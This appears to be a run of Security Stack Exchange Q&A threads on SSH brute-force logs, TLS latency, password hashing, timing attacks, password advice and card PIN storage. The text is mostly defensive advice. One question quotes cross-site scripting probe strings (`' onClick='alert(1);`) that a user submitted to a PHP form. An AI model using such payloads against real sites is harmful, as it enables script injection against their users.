11:28:33 ubuntu-leno1 sshd[8474]: Failed password for invalid user wheeling from 172.25.1.1 port 49099 ssh2 Jan 12 11:28:36 ubuntu-leno1 sshd[8476]: Failed password for invalid user mustang from 172.25.1.1 port 29364 ssh2 Jan 12 11:28:39 ubuntu-leno1 sshd[8478]: Failed password for invalid user admin from 172.25.1.1 port 23734 ssh2 Jan 12 11:28:42 ubuntu-leno1 sshd[8480]: Failed password for invalid user jennifer from 172.25.1.1 port 15409 ssh2 Jan 12 11:28:46 ubuntu-leno1 sshd[8483]: Failed password for invalid user admin from 172.25.1.1 port 40680 ssh2 Jan 12 11:28:48 ubuntu-leno1 sshd[8485]: Failed password for invalid user money from 172.25.1.1 port 27060 ssh2 Jan 12 11:28:52 ubuntu-leno1 sshd[8487]: Failed password for invalid user Justin from 172.25.1.1 port 17696 ssh2 Jan 12 11:28:55 ubuntu-leno1 sshd[8489]: Failed password for invalid user admin from 172.25.1.1 port 50546 ssh2 Jan 12 11:28:58 
ubuntu-leno1 sshd[8491]: Failed password for root from 172.25.1.1 port 43559 ssh2 Jan 12 11:29:01 ubuntu-leno1 sshd[8494]: Failed password for invalid user admin from 172.25.1.1 port 11206 ssh2 Jan 12 11:29:04 ubuntu-leno1 sshd[8496]: Failed password for invalid user chris from 172.25.1.1 port 63459 ssh2 Jan 12 11:29:08 ubuntu-leno1 sshd[8498]: Failed password for invalid user david from 172.25.1.1 port 52512 ssh2 Jan 12 11:29:11 ubuntu-leno1 sshd[8500]: Failed password for invalid user foobar from 172.25.1.1 port 35772 ssh2 Jan 12 11:29:14 ubuntu-leno1 sshd[8502]: Failed password for invalid user buster from 172.25.1.1 port 18745 ssh2 Jan 12 11:29:17 ubuntu-leno1 sshd[8505]: Failed password for invalid user harley from 172.25.1.1 port 38893 ssh2 Jan 12 11:29:20 ubuntu-leno1 sshd[8507]: Failed password for invalid user jordan from 172.25.1.1 port 64367 ssh2 Jan 12 11:29:24 ubuntu-leno1 sshd[8509]: Failed password for invalid user stupid from 172.25.1.1 port 27740 ssh2 Jan 12 11:29:27 ubuntu-leno1 sshd[8511]: Failed password for invalid user apple from 172.25.1.1 port 22873 ssh2 Jan 12 11:29:30 ubuntu-leno1 sshd[8514]: Failed password for invalid user fred from 172.25.1.1 port 54420 ssh2 Jan 12 11:29:33 ubuntu-leno1 sshd[8516]: Failed password for invalid user admin from 172.25.1.1 port 58507 ssh2 Jan 12 11:29:42 ubuntu-leno1 sshd[8518]: Failed password for invalid user summer from 172.25.1.1 port 48271 ssh2 Jan 12 11:29:45 ubuntu-leno1 sshd[8520]: Failed password for invalid user sunshine from 172.25.1.1 port 5645 ssh2 Jan 12 11:29:53 ubuntu-leno1 sshd[8523]: Failed password for invalid user andrew from 172.25.1.1 port 44522 ssh2 It seems that I'm experiencing an ssh brute force attack. Is this a common occurrence, or am I being specifically targeted? What should I do now? Should I consider the attack successful and take measures? -----Edit------- The fact that the attack comes from an internal IP address is explained by this server having a ssh redirection from outside. It happened really quickly after opening the port, are every public IP scanned in the wild in search of an existing server behind ?
Yes, it looks like you are experiencing a brute force attack. The attacker is on a class B private address, so it is likely to be someone with access to your organization's network that is conducting the attack. From the usernames it looks like they are running through a dictionary of common usernames.

Have a look at 'How to stop/prevent SSH bruteforce' (Serverfault) and 'Preventing brute force SSH attacks' (Rimu Hosting) on how to take measures to mitigate some of the risk relating to SSH bruteforce attacks.
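Beyond those links, typical mitigations include disabling password authentication entirely, limiting who may log in, and rate limiting (for example with fail2ban). As a hedged illustration, an sshd_config along these lines is a common starting point; the user names are placeholders and the settings should be adapted to your environment.

```
# /etc/ssh/sshd_config (excerpt)
PermitRootLogin no            # never allow direct root login
PasswordAuthentication no     # require SSH keys instead of passwords
MaxAuthTries 3                # drop the connection after a few bad attempts
AllowUsers alice bob          # hypothetical allow-list of accounts permitted to use SSH
```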
{ "source": [ "https://security.stackexchange.com/questions/110706", "https://security.stackexchange.com", "https://security.stackexchange.com/users/97016/" ] }
110,723
I am working on a multiplayer game. I intended for all data to be exchanged over HTTPS, but it is way too slow. High latency networks take over a second for the SSL handshake. While the game is turn-based and does not require blazing-fast data transfer, 1000-2000 ms ping is still unacceptable. What protocols/approaches can I use to transfer data securely, with as low latency as possible?

Edit: Just to respond to your enquiries about the payload, here is what the result of a unit attacking an enemy building looks like (obviously I'm not sending a string of ones and zeros, this is just a binary representation):

00000000 10010011 01010001 00100011 01011100 01010001 01010000

Message breakdown:
00000000 - client's request executed with status "OK"; other values correspond to specific error messages
10 - object is owned by Player 2
010 - object is a building
0110 - object is located at x=6 (always 0<=x<=14)
101 - object is located at y=5 (always 0<=y<=6); owner and location are sufficient to describe any object uniquely
0001 - 1 byte-worth of modified attributes follows
0010 0011 - object's health is now 3
01 - object is owned by Player 1
011 - object is a unit
1000 - object is located at x=8
101 - object is located at y=5
0001 - 1 byte-worth of modified attributes follows
0101 0000 - this object can no longer move/attack this turn

I don't think that I can get any more data density without making it expensive on the CPU.
HTTPS is HTTP over TLS. If you implement a game, using HTTP is usually not a good idea. The HTTP protocol is designed for requesting documents, not for real-time games. A better idea would be to develop your own protocol directly based on TCP or UDP (UDP is faster while TCP is easier to use, but that's a topic for Game Development Stack Exchange) and tunnel it through TLS.

The time-consuming key exchange process only needs to happen once when establishing the connection. When you keep the same connection open during the game, the only latency overhead is caused by encryption and decryption.

TLS supports multiple cipher suites (sets of cryptographic algorithms which are used). The choice of cipher suite can be used to find a compromise between performance and security.
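As a rough sketch of "your own protocol tunnelled through TLS", a persistent Java client connection could look like the following. The host name and port are placeholders, certificate configuration is omitted, and the payload bytes are simply the example message from the question.

```java
import java.io.DataInputStream;
import java.io.DataOutputStream;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

public class GameClientSketch {
    public static void main(String[] args) throws Exception {
        SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault();
        try (SSLSocket socket = (SSLSocket) factory.createSocket("game.example.com", 4433)) {
            socket.startHandshake();               // the expensive key exchange happens once, here

            DataOutputStream out = new DataOutputStream(socket.getOutputStream());
            DataInputStream in = new DataInputStream(socket.getInputStream());

            // The same encrypted connection is reused for every turn, so only
            // per-message encryption/decryption latency remains afterwards.
            out.write(new byte[] {0x00, (byte) 0x93, 0x51, 0x23, 0x5C, 0x51, 0x50});
            out.flush();
            int status = in.read();                // read the server's status byte
            System.out.println("server status byte: " + status);
        }
    }
}
```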
{ "source": [ "https://security.stackexchange.com/questions/110723", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96071/" ] }
110,734
After decades of hearing that "delete" does not really make the data impossible to recover, I have to ask WHY the OS was not corrected long ago to do what it should have been doing all along? What is the big deal? Can't the system just trundle along in the background overwriting and whatever else has to happen? Why do we need additional utilities to do what we always thought was happening? What is the motivation of OS developers to NOT correct this problem?

ADDITION: This is not a technology question, because clearly it IS possible to delete things securely, or else there would not be tools available to do it. It is a policy question: If some people feel that it is important and should be part of the OS, why is it not part of the OS? Many things have been added to OSes over the years, and this could certainly be one of them. And it IS an important issue, or there would not have been articles and stories about it for about 3 decades now. What is with the inertia? Just do the right thing.
Because of the following reasons:

- Performance - it takes up resources destroying files. Imagine an application that uses hundreds or thousands of files. It would be a huge operation to securely delete each one.
- Extra wear and tear on the drives.
- Sometimes the ability to retrieve a file is a feature of the OS (e.g. Trash, Recycle Bin, Volume Shadow Copy).
- As noted by Xander, sometimes the physical storage mechanism is abstracted from the OS (e.g. SSDs or network drives).
{ "source": [ "https://security.stackexchange.com/questions/110734", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
110,749
I have an input box for INSERTing into the database. It is written in PHP PDO. Someone typed in:

<"'>

and also:

' onClick='alert(1);

I'm assuming they were in two different input boxes. But somehow, the user was able to modify a field in the database to a negative number when the only way (if doing it right, which is by pressing a button) is to increment by +1 or -1. For example, if the user presses the "+1" button, it will +1 in the database; if they press "-1", it will -1 in the database. Yet they have a negative number of -50 or something like that. What could they have done? What is my website vulnerable to? Here is the code:

$insertQuery = $dbh->prepare("INSERT INTO fcomments (poster, lid, post_id, comment, time_stamp)
    VALUES(:user_id, :lid, :post_id, :comment, :timeNow)");
$insertQuery->bindParam(':user_id',$user_id);
$insertQuery->bindParam(':lid',$lid);
$insertQuery->bindParam(':post_id',$post_id);
$insertQuery->bindParam(':comment',$comment);
$insertQuery->bindParam(':timeNow',$timeNow);
$insertQuery->execute();

It looks like all the values are bound. Not sure what could be the problem?
{ "source": [ "https://security.stackexchange.com/questions/110749", "https://security.stackexchange.com", "https://security.stackexchange.com/users/97062/" ] }
110,762
Why do most browsers store browsing history by default? It seems like people often have to go to the hassle of manually deleting their history or using incognito mode. Are there some major advantages to storing this data in most cases?
There are a lot of advantages. Here are some:

- Auto-completion of previously visited URLs you forgot, which can speed up the web surfing process tremendously. You might have remembered parts of a URL or website title, and your browser can usually pick those up if you typed them in. I love this feature.
- This can offer extra security. As mentioned by kasperd, it can greatly reduce the risk of typosquatting.
- Storing previously-loaded data in a cache to speed up web-browsing. Great for slow connections. Great for reducing load on web servers.
- Storing cookies so websites remember your login information, etc.
{ "source": [ "https://security.stackexchange.com/questions/110762", "https://security.stackexchange.com", "https://security.stackexchange.com/users/72547/" ] }
110,948
I have a Java server with Spring Boot and a JS frontend in AngularJS. My teacher told me to use HTTPS for passwords, because I cannot hash them securely enough that nobody can hack them. With HTTPS, if I get it right, I do not have to hash them additionally. My source: I just send username and password over https. Is this ok?

So now to my question: I store the password in a DB, of course. Where should I hash it? Frontend or backend?

If I hash it on the frontend, I do not have to do anything else on the backend; but if the HTTPS certificate expires, I'm insecure. If I do it on the backend, I do not have to do anything else on the frontend; but if the HTTPS certificate expires, I'm insecure.

I would use scrypt, which is made for password hashing.
@John already described the passing of the password over the network very well (use HTTPS). To answer your question:

> Where should I hash them? Frontend or backend?

The backend. If you only hash them in the frontend, you are vulnerable to a pass-the-hash attack. The reason that you hash passwords in your database is to prevent an attacker who has already compromised your database from using those passwords. If you hash the passwords in the backend, an attacker has to first crack them to use them on your website. But if you hash them in the frontend, an attacker doesn't need to do this; they can just pass the hash as it is stored in the database.
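Since the question mentions Spring Boot, a minimal backend sketch might use Spring Security's BCryptPasswordEncoder from spring-security-crypto; the wrapper class below is invented for illustration. Spring also ships an SCryptPasswordEncoder if you prefer scrypt, as the question suggests.

```java
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;

public class PasswordService {
    private final BCryptPasswordEncoder encoder = new BCryptPasswordEncoder();

    // Called at registration: only the bcrypt hash is persisted.
    public String hashForStorage(String rawPassword) {
        return encoder.encode(rawPassword);
    }

    // Called at login: the raw password arrives over HTTPS and is checked in the backend.
    public boolean matches(String rawPassword, String storedHash) {
        return encoder.matches(rawPassword, storedHash);
    }
}
```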
{ "source": [ "https://security.stackexchange.com/questions/110948", "https://security.stackexchange.com", "https://security.stackexchange.com/users/97323/" ] }
111,040
Say we have a Java web application which uses a shared secret to verify the identity of the client. The secret is stored on the server, and the client transmits the secret over SSL where it is checked:

String SECRET_ON_SERVER = "SomeLongRandomValue";
if (secretFromClient.equals(SECRET_ON_SERVER)) {
    // request verified - client knows the secret
} else {
    // request not verified - generate failed response
}

String.equals(String) returns as soon as a single character doesn't match. This means an attacker, if they can accurately track the time it takes to respond, should theoretically know how many characters of their attempt - secretFromClient - match the server secret, leading to a plausible brute force attack. But the difference in timings seems to be tiny. Quick investigation suggests the differences are easily in the sub-millisecond range.

Can I safely ignore these kinds of timing attacks due to their insignificance compared to network noise? Are there examples of successful < 1ms timing attacks over the internet?
In theory, this is a possible exploit, and if you are in super-paranoia mode, you should assume the answer is "Yes". In every other case, the answer will be: "No."

Although there are published papers (one is linked in the answer by @Oasiscircle) which claim that they are able to run successful timing attacks, one has to carefully read the preconditions, too. These published "practical" attacks work on some algorithms on a LAN with one, at most two, switches in between. Which implies an almost perfectly reliable, constant round trip time. For that scenario, it is indeed practical to attack certain algorithms via timing, but this is meaningless in the context of the question. In fact, I consider these remote attacks as "cheating". The fact that an attack is remote is irrelevant if you carefully design the experiment so the delay is nevertheless almost exactly predictable.

When attacking any server on the internet, this precondition does not hold (not even remotely, pun intended), even on a server that is geographically and topologically near. Also, attacking a string comparison via timing is not at all the same as attacking a RSA calculation. It is much more difficult because the entire operation as well as the measurable difference is a lot smaller.

A string comparison of a password (assuming your passwords are "reasonably" sized) takes a few hundred cycles or less, of which the possible initial cache/TLB miss is by far the biggest, dominating factor, followed by the terminal mispredicted branch (which happens for both a match and a non-match). The difference between a match and a non-match is maybe one or two dozen nanoseconds. A context switch takes several hundreds of nanoseconds, as does a cache miss. Schedulers typically operate at a micro- or millisecond resolution and do some very non-trivial work (in the hundreds/thousands of nanoseconds) in between at times that are hard to predict to say the least.

Reliably measuring differences on the nanosecond scale at all is not entirely trivial, either. Ordinary programmable timers do not nearly have the required resolution. HPET on commodity hardware is guaranteed to deliver 100ns resolution (per specification) and in practice goes down to 1ns on many implementations. However, it works by generating an interrupt. This means you can schedule a timer to some point in time precise to the nanosecond, but you cannot really use it to measure single nanoseconds. Also, the interrupt adds an overhead and uncertainty of some dozen nanoseconds (... to some dozen nanoseconds that you want to measure!). Cycle counters need to be serialized to be accurate. Which, too, renders them rather useless for precisely measuring an external event at nanosecond resolution since their accuracy depends on what the pipeline looked like.

There are more things to consider which add unpredictable noise, such as legitimate users (yes, those exist, too!) and interrupt coalescing.

Finally, consider the mention of "Java", which means that e.g. a garbage collector may be executing at an unpredictable time (in any case, unpredictable for a remote attacker), causing unpredictable jitter on an unknown (micro, milli?) scale.
In theory, you could of course collect a large number of samples, even at lower resolution, say microsecond scale, and statistically eliminate the various sources of noise. You would never be able to tell for absolutely certain whether a password is correct, but you will eventually be able to tell with a sufficiently high probability (say 85% or 90%, or even 99%), and you can then manually verify those few candidates. That's good enough!

This is possible, at least in theory, but it would take a huge number of samples even for divining a single password. And saying "huge" is really an understatement of galactic proportions. The number of samples needed practically implies that you must parallelize the attack, or it will take forever.

Now, parallelizing such a timing attack to any serious extent is not easily possible because you are subject to the observer effect (in the same sense as in quantum mechanics). Doing a couple of probes (maybe 5-8) in parallel should work, presuming that the server has enough idle cores, but as you scale up, eventually one probe will inevitably affect another probe's outcome in an unpredictable and disproportionate way. There is nothing you can do to prevent that from happening, so parallelizing doesn't really work well (I am not even taking into account the fact that interrupts usually go over a single core and that there is only a single physical copper wire which data must go through, so even if the server still has idle cores remaining, it may quite possibly be the case that one probe affects another). On the other hand, running a not-massively-parallel attack is bound to fail because you will die of old age before you find a single password.
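That said, if you would rather remove the worry entirely than reason about noise, a constant-time comparison is cheap insurance, and the JDK already provides one. A sketch using MessageDigest.isEqual on the UTF-8 bytes:

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

public class SecretCheck {
    // When the lengths match, every byte is compared regardless of where the first
    // mismatch occurs, so the response time no longer reveals how many leading
    // characters of the attacker's guess are correct.
    static boolean constantTimeEquals(String secretFromClient, String secretOnServer) {
        return MessageDigest.isEqual(
                secretFromClient.getBytes(StandardCharsets.UTF_8),
                secretOnServer.getBytes(StandardCharsets.UTF_8));
    }
}
```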
{ "source": [ "https://security.stackexchange.com/questions/111040", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24011/" ] }
111,260
In this article on the BBC's website they offer advice on how to develop a password. The steps are as follows.

Step 1: Choose an artist (a recording artist, I presume)
Let's choose as an example case study the teen idol and all round bad boy Justin Bieber.*

Step 2: Choose a song (the catchier the better)
Next, I need to choose a song from the Biebs' vast repertoire of classics. My particular favourite of his is his insightful look into the dark world of controlling relationships, "Boyfriend".

Step 3: Choose some lyrics
Now I need some lyrics from "Boyfriend"; I'll go with the slightly menacing chorus: "If I was your boyfriend, I'd never let you go".

Steps 4, 5 and 6: Passwordify the lyric
Now we need to take the Biebs' prose and turn it into a password. We do this by taking the first letter of each word in the lyric "If I was your boyfriend, I'd never let you go, I'd never let you go": iiwybinlyg
Make it case sensitive: iIwyBiNlYg
Turn it into 'leet speak' by changing it up with symbols and numbers: 1Iwy&1NlY9

My question isn't about the mathematical strength of passwords, which obviously will depend on the lyric that is chosen and how one goes about passwordifying it; it is more about the predictability of the total amount of possible passwords that are likely to pop up using this method. As we are all aware, humans can be very predictable creatures; it wouldn't take a huge amount of effort to generate dictionaries based on certain demographics, music genres, or targeted attacks based on profiling individuals.

My initial thought on this was that this would be terrible advice to give out in a business as it would lead to many users using the same formula to develop their passwords, which would only be exacerbated by making the passwords more predictable. On a national scale this could be sound advice, which leads me to my question:

Is the BBC's advice on how to choose a password sensible, given how predictable we humans are? If so, in what scenarios is this sensible advice?

*Justin Bieber used for humorous reasons only.
My question isn't about the mathematical strength of passwords which obviously will depend on the lyric that is chosen and how one goes about passwordifying it, it is more about the the predictability of the total amount of possible passwords that are likely to pop up using this method. This is a good question, and I'm going to depart from the norm here, put on my tinfoil hat, and say "no, this is not a good idea." Why? Let's look at it in the context of the Snowden leaks. Because the GCHQ spies on all traffic on the British internet , and according to the Snowden leaks , your internet traffic is shared with the five eyes. Even if you're using HTTPS, this is a bad idea. "But Mark Buffalo, you're being a maniac tinfoil hattist again!" Think about it. The time to crack your password was suddenly and significantly reduced. How? GCHQ takes history of your online searches. They likely know when you signed up for a certain website thanks to XKeyscore . If they know when you signed up for that website, they'll see you went to Google.com around that time and did a search for song lyrics. Even if you're using HTTPS, the fact that you connected to google.com around that time, and then visited a website that hosts song lyrics, is all they need to begin breaking your password. Even if they can't view the traffic, they can still see that you connected. Even if you're using HTTPS, this doesn't stop them from hosting lyric websites themselves. This also doesn't stop companies from logging your search results, and it doesn't stop the companies from providing these results to anyone. If they know what kind of songs you like, or don't like, it makes it even easier. Now they can write an algorithm to crack your passwords much, much easier than brute-forcing every possible combination. Or even better yet, use a ready-made password cracker with a provided dictionary of those results. But Mark Buffalo, the government isn't monitoring me! That's all fine and dandy. You generally don't need to worry about them unless you're a criminal. Or you're privacy-conscious . Or you're a security researcher. There's another important aspect you need to consider, which I think is far worse than the government: advertisement companies, and hackers "But Mark Buffalo, I use NoScript (great) and Ghostery (Ghostery sells your info)!" Most people don't use those. And many people who do, also don't use those tools when they use their smartphone. There are data trails everywhere, especially if you own a smartphone (android in particular), and there are plenty of evil marketing companies that will sell your data down the river the first chance they get. Or maybe they aren't evil companies, but they get breached by hackers. Anyone with a "need" could buy that data, and those sophiscated enough could steal it. While this seems like frantic worrying for such a small thing for most people, it gets much worse when you delve into the realm of federal contracting. This is one of the ways security breaches start. All of the steps listed previously could be done without XKeyscore. They can be done very easily with vast marketing databases. Stop the tinfoil, Mark. If I were wearing my tinfoil hat right now, I'd believe this article was made as part of a plan to intentionally weaken standards. I personally believe that weakening standards is a national security risk, especially when federal contractors adopt those weakened standards. Personally, I would worry more about evil marketing companies and hackers than I would the government . 
Especially when deliberately-weakened standards are what help potentially-hostile countries gain unauthorized access to critical infrastructure and intellectual property. But seriously, this makes your password weaker Now let's talk about numbers, and social engineering. With a normal brute force of this password, you'd likely need the following characters based on this password policy: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= That's 76 possible characters. With this password method, assuming most people will use 6-7 words to generate the password, and perhaps add 1 symbol - !@#$%^&*() being the most common - plus a number, you'll need to test - for an 8-character password - 1,127,875,251,287,708 combinations to exhaust the password space. This could take an impossibly long time depending on the hashing algorithm and hardware. Let's use md5 as an example (it's terrible, but it's computationally cheap. Please don't use md5; I am only using it as an example) . To exhaust the character space of an 8 character password, it would take 4 years to crack with a cheap workstation. About 4 years 25 days 7 hours 46 minutes 54 seconds. If you were to up the password length to 9, it would take over 309 years. Keep in mind that processing power is growing rapidly. Learning extra parameters about the user's password allows you to simplify this. Let's assume that you choose the following song: baby hit me one more time . This is your favorite song, and I know this because I socially-engineered you into telling me. Let's choose a predictable lyric phrase to create a password with: Hit me baby one more time . This becomes HmBomT . Now let's add some leet with a number. Now we have H@BomT3 . Now that we know your favorite song, and your favorite phrase, this is what your password alphabet space becomes: hHmMbBoOmMtT1234567890!@#$%^&*()-_+= As you can see, this alphabet space is significantly reduced. It's much, much faster if you know what character the password starts with, but let's assume you don't. Let's further assume it's been randomized. Now you've reduced the time needed to exhaust the password space to 2,901,713,047,668 combinations, it takes 3 days to crack the password with a cheap workstation. Let's upgrade it to 9 characters. Now it takes 137 days 15 hours 47 minutes. You can calculate this yourself (charset: custom). Also, all of this assumes you don't have a dedicated GPU cluster . EDIT : It's come to my attention that there is now evidence of custom hardware solutions dedicated to cracking bcrypt, one of which is a lot less expensive than a 25-GPU array, uses less power, and is vastly superior in every regard. Please read this amazing article if you want to learn more. But shouldn't we simply increase password length? Yeah, you could. Truthfully, it greatly increases entropy when you increase the password length. However, then it becomes annoying to enter - especially for corporate environments that require you to log out every time you leave the computer. On top of that, it's very hard to remember this password. You might eventually forget it after entering different passwords and being forced to change every few months. Even worse, you could forget it immediately, and be forced to visit the IT help desk to reset your password. This results in costs to the business, and lost productivity. In fact, a better method would be a xkcd's correct horse battery staple . 
You could use an upper case somewhere, and a number somewhere else, or you could make it even easier while increasing entropy: something like correct horse battery staple gasoline . It's very easy to remember, very easy to type, and it's very hard for computers to break. Also remember that this should be randomly-generated from a 2048 word list. For websites, I would recommend a password manager such as KeePass. I would not use LastPass , as it's vulnerable to phishing attacks. Websites can know you have LastPass enabled, because your browser is sending this information to the website if requested! This is part of how browser-fingerprinting works. For corporate and other logins which you aren't able to use a password manager with, I would recommend a variant of correct horse battery staple with an extra word. Maybe correct horse battery staple gasoline ? Much easier to remember.
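If you want to generate such a passphrase programmatically rather than picking the words yourself, a minimal PHP sketch looks like the following. The word list here is only an assumption for illustration: use a real diceware-style list of a couple of thousand words, not the toy list shown.

```php
<?php
// Sketch of a diceware-style passphrase generator, as recommended above.
// $wordlist is assumed to be a large list of common words; random_int() is a
// CSPRNG in PHP 7+, so the selection is not guessable.
function generatePassphrase(array $wordlist, int $words = 5): string
{
    $picked = [];
    for ($i = 0; $i < $words; $i++) {
        $picked[] = $wordlist[random_int(0, count($wordlist) - 1)];
    }
    return implode(' ', $picked);
}

// Tiny illustrative list only - use a proper diceware-style wordlist in practice.
$wordlist = ['correct', 'horse', 'battery', 'staple', 'gasoline', 'kettle', 'orbit', 'walrus'];
echo generatePassphrase($wordlist, 5);
```

With a 2048-word list each word contributes 11 bits of entropy (log2 2048 = 11), so five words give about 55 bits; the point is that the entropy must come from the random selection, not from you picking words you happen to like.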
{ "source": [ "https://security.stackexchange.com/questions/111260", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83641/" ] }
111,597
Let's say I have a video file that is split into multiple parts. Each piece is 2 Megabytes. I also have a list of the *insert hash name here* for each piece and also for the full file. Now assume that I have misplaced/lost/fubar one of these pieces. Could I retrieve the lost piece from its hash, using brute force or any other method in a human-lifespan amount of time? A rainbow-style table would be unfeasible, I think. Bonus numerical question - how much would it take on a medium-size distributed computing network based on mostly consumer PCs? (Example: 4 GHz CPU + entry level GPU + 8 GB RAM)
A simple answer: NO. It is like asking: if I know that x % 4 = 3, is it possible to find the value of x? No. Sure, there would be infinitely many values of x satisfying this equation, but you simply wouldn't know which one is correct. Similarly, many (or infinitely many) video clips could result in a given hash value (obviously, an unbounded number of video clips has to be mapped to a fixed number of hash values, so collisions are bound to happen). You wouldn't know which clip is correct. And in human time? No. EDIT: As pointed out in the comments, since the file is chunked into pieces of 2 MB, there isn't an infinite number of possibilities, but it is still enormous (2 raised to the power of roughly 16.7 million). Brute-forcing such a large number of possibilities, in human time, is still close to impossible.
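To make the scale concrete, here is the arithmetic behind that figure: a 2 MB piece is 2 × 1,048,576 = 2,097,152 bytes, i.e. 16,777,216 bits, so the number of distinct possible 2 MB pieces is 2^16,777,216, a number with roughly five million decimal digits. A typical hash output is only 128 to 512 bits, so an astronomically large number of distinct pieces necessarily map to any single hash value, and enumerating even a microscopic fraction of the candidates is far beyond any realistic computing effort, distributed or not.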
{ "source": [ "https://security.stackexchange.com/questions/111597", "https://security.stackexchange.com", "https://security.stackexchange.com/users/41866/" ] }
111,611
My employer wants/wanted to install a 3rd-party app on my personal cell phone. One of the issues on which we still don't see eye to eye is security. Here are some issues that concern me: The 3rd party sent everyone in our company the same password in a company-wide e-mail. The app does not have a way to change the password. All of our usernames are predetermined and easily guessable. It's possible to log in as anyone from any device with this app. My boss has used a car analogy, suggesting that I'm requesting security similar to a "full roll cage, 5-point safety harness, helmet, HANS device, and a fire suppression system". I've pointed out that the security of the app is more like that of a Ford Pinto. I've compared his car safety analogy to "more like using 2-factor authentication with a 32-character randomly generated password using a mix of lowercase, uppercase, numbers, and special characters, stored via salted (inefficient) password hashing with each user having a different randomly generated salt". I am no security expert. Perhaps I was incorrect in my response to him. Can someone point me to a better response (e.g. an unbiased source)? Update: A few people have asked what type of app it is. The best way I can explain it is a social media app just for our company.
Let's address your points one by one. The 3rd party sent everyone in our company the same password in a company-wide e-mail. A password that everyone knows is not a password. It's like leaving the key under the mat, only without the mat to hide it. The app does not have a way to change the password. So if you ever lose your keys or think someone else might have them, you can't change the locks - and from point 1, we know that your keys are already in other people's hands. All of our usernames are predetermined and easily guessable. So, the people who have your keys also know where you live. It's possible to login as anyone from any device into this app. Put the first three together - other people have your keys, they know where you live, and you can't change the locks - and yeah, this is the result. Anyone can get into somewhere that should be yours alone. To recycle your employer's car analogy, he's asking all employees to lock their cars but leave the keys in the door, and then park in the company car park underneath a sign with their name on. And on top of all this, he's asking you to do this on your personal phone. Your employer has no right to be touching that device. Depending on what this app does, this could be exposing your personal data to risk because of a third-party security flaw that you have no control over. Even if the third-party app isn't malicious and doesn't do anything that causes a risk, there's no guarantee that it's 100% free of accidental flaws or bugs that might cause a security weakness or present an opportunity for some other malicious party to exploit. Given this third-party company's atrocious handling of basic security practices like "don't email passwords", "don't re-use passwords", and "always allow users to change their passwords", the chances of their app being completely safe, secure and free of vulnerabilities is looking pretty slim.
{ "source": [ "https://security.stackexchange.com/questions/111611", "https://security.stackexchange.com", "https://security.stackexchange.com/users/98125/" ] }
111,642
Would it be a good idea to have one account which requires two different passwords? For example, your login details would be: email: [email protected]; password 1: P4$$w0rd1; password 2: HereIsMySecondPassword. Now, when the user logs in to my site, he is required to enter both passwords. Would this be a better idea than just one stronger password? The user could choose two passwords which he can remember more easily than one strong one.
Not really. It's essentially one password, with a press of the return key as one character. It adds complexity to the log in process, which isn't generally a good thing (users would probably choose one good password, and one quick to type password). Don't forget @AviD's rule: "Security at the expense of usability, comes at the expense of security" Depending on how the passwords were stored, they would slightly decrease the ability of attackers to brute force accounts, since an attacker would need to break both parts. I doubt that this balances out the usability issue though.
{ "source": [ "https://security.stackexchange.com/questions/111642", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93860/" ] }
111,654
I was reading Breaking VISA PIN by L. Padilla. He stated that changing the PIN will change the stored data on the card. But I tried this on several cards, and changing the PIN does not affect the data stored on tracks 1 and 2. How can I interpret that? Is there any way to extract the PIN from this data? Here is some sample data: Track 1: PAN: 6104XXXXXXXXXXXX Expiration date: 1608 Service code: 100 Discretionary data: 91516084076901530 Track 2: PAN: same as track 1 Expiration date: 1608 Service code: 100 Discretionary data: 9154177591894 Using another reader: ;6104XXXXXXXXXXXX=16081009154177591894?
In the past they may have encoded the PIN on the card, however hopefully (as your test indicates) they have stopped. It looks like the article that you cite is from 2009, which is rather out of date. As to why they should not encode the PIN onto the card take a look at the NIST Special Publication 800-63-2, the Electronic Authentication Guideline. In the case of Multi-Factor authentication it should consist of a combination of "Something you know, something you have and something you are". For a card and PIN system you have something (the card) and know something (the PIN). If you encode the PIN onto the card then you only have something, which is single factor authentication and is not as secure. If you are interested in the security of PINs in credit cards you can take a look at: https://www.pcisecuritystandards.org/documents/PCI_PIN_Security_Requirements.pdf . This is the PCI requirements for securing PINS. As for the differences in the Discretionary Data these may come from several sources. From ISO/IEC 7813 the maximum record length of track 1 and 2 are different. The DD is used to fill the balance of characters. For Discretionary Data the implementation is left up to the issuing company. As to what it might contain you may be able to find out by looking at the documentation from the issuing company (I rather doubt you will find anything but stranger things have happened). It may just be random padding to reach the proper length or it could contain additional data. See https://stackoverflow.com/questions/12239855/discretionary-data-from-magnetic-strip-credit-card-how-to-parse .
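To illustrate why the Track 2 string in the question decomposes into exactly those fields, here is a rough PHP sketch that splits it according to the ISO/IEC 7813 layout referenced above (start sentinel, PAN, separator, YYMM expiry, 3-digit service code, discretionary data, end sentinel). It is only a parsing illustration; it says nothing about what the issuer put into the discretionary data, and, as explained above, there is no PIN field anywhere in it.

```php
<?php
// Rough sketch: split an ISO/IEC 7813 Track 2 string into its fields.
// The sample string is the one from the question; 'X' is the masking used there.
function parseTrack2(string $track2): ?array
{
    // ;PAN=YYMM SSS DD...?  (PAN up to 19 digits)
    if (!preg_match('/^;([0-9X]{1,19})=(\d{4})(\d{3})(.*)\?$/', $track2, $m)) {
        return null; // not a well-formed Track 2 string
    }
    return [
        'pan'                => $m[1],
        'expiry_yymm'        => $m[2],
        'service_code'       => $m[3],
        'discretionary_data' => $m[4],
    ];
}

print_r(parseTrack2(';6104XXXXXXXXXXXX=16081009154177591894?'));
// Fields as given in the question:
//   pan                => 6104XXXXXXXXXXXX
//   expiry_yymm        => 1608
//   service_code       => 100
//   discretionary_data => 9154177591894
```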
{ "source": [ "https://security.stackexchange.com/questions/111654", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90801/" ] }
111,748
